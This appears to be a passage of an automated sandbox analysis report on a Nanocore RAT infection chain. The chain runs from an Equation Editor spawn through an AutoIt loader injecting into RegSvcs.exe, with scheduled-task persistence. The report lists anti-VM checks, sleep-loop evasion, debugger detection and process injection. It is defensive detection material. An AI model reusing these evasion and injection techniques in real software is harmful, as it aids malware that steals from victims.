Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

Yara detected AntiVM autoit script

Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2796	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 4838 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep time: -48380s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 2620	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 236	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 3937 > 30	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep time: -39370s >= -30000s	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif TID: 1580	Thread sleep count: 110 > 30	Jump to behavior

Sleep loop found (likely to delay execution)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 4838 delay: -10			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Thread sleep count: Count: 3937 delay: -10			Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 4838	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 7950	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 1761	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 749	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Window / User API: threadDelayed 3937	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe_
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareUser.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenAq
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenD6
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") ThenfMf
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exex
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: VMwareService.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666203454.0000000000914000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenr36\|
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VBoxTray.exe
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") ThenC
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") ThenU[U
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then48
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VMwaretray.exek
Source: mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thent7n
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027D353 VirtualQuery,GetSystemInfo,

4_2_0027D353

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0026A2DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0027AFB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,	4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,	5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,	5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00FFBF17

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

5_2_00FBEE30

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00286AF3 mov eax, dword ptr fs:[00000030h]

4_2_00286AF3

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0027E4F5

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0028ACA1 GetProcessHeap,

4_2_0028ACA1

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A35D BlockInput,

5_2_0100A35D

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E643 SetUnhandledExceptionFilter,	4_2_0027E643
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0027E4F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0027E7FB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00287BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00287BE1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCF170 SetUnhandledExceptionFilter,	5_2_00FCF170
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA128 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00FCA128
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC7CCD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00FC7CCD

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 340000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 2D0000	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 7EFDE000	Jump to behavior

Contains functionality to simulate keystroke presses

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_00FE43FF

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE6C61 LogonUserW,

5_2_00FE6C61

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_00FBD7A0

Contains functionality to simulate mouse events

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3321 __wcsicoll,mouse_event,__wcsicoll,mouse_event,

5_2_00FE3321

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF602A GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

5_2_00FF602A

Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager48
Source: RegSvcs.exe, 00000006.00000002.667096389.000000000291F000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: mmuiqlcvwo.pif.4.dr	Binary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666244270.0000000000E9D000.00000004.00000001.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: mmuiqlcvwo.pif, 00000005.00000002.666027281.000000000062D000.00000004.00000001.sdmp	Binary or memory string: Program ManagerV
Source: mmuiqlcvwo.pif, 00000005.00000000.479651653.0000000001032000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000000.511159853.0000000001032000.00000002.00020000.sdmp	Binary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
Source: mmuiqlcvwo.pif, 00000005.00000002.666605322.00000000013F0000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.666553856.0000000000F40000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666109150.0000000000810000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666579766.0000000001220000.00000002.00020000.sdmp	Binary or memory string: Program Manager<
Source: RegSvcs.exe, 00000006.00000002.667114427.0000000002933000.00000004.00000001.sdmp	Binary or memory string: Program Manager@

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\vbc.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

4_2_00279D99

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0027E34B cpuid

4_2_0027E34B

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0027CBB8

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_00FCE284

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01022BF9 GetUserNameW,

5_2_01022BF9

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0026A995 GetVersionExW,

4_2_0026A995

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
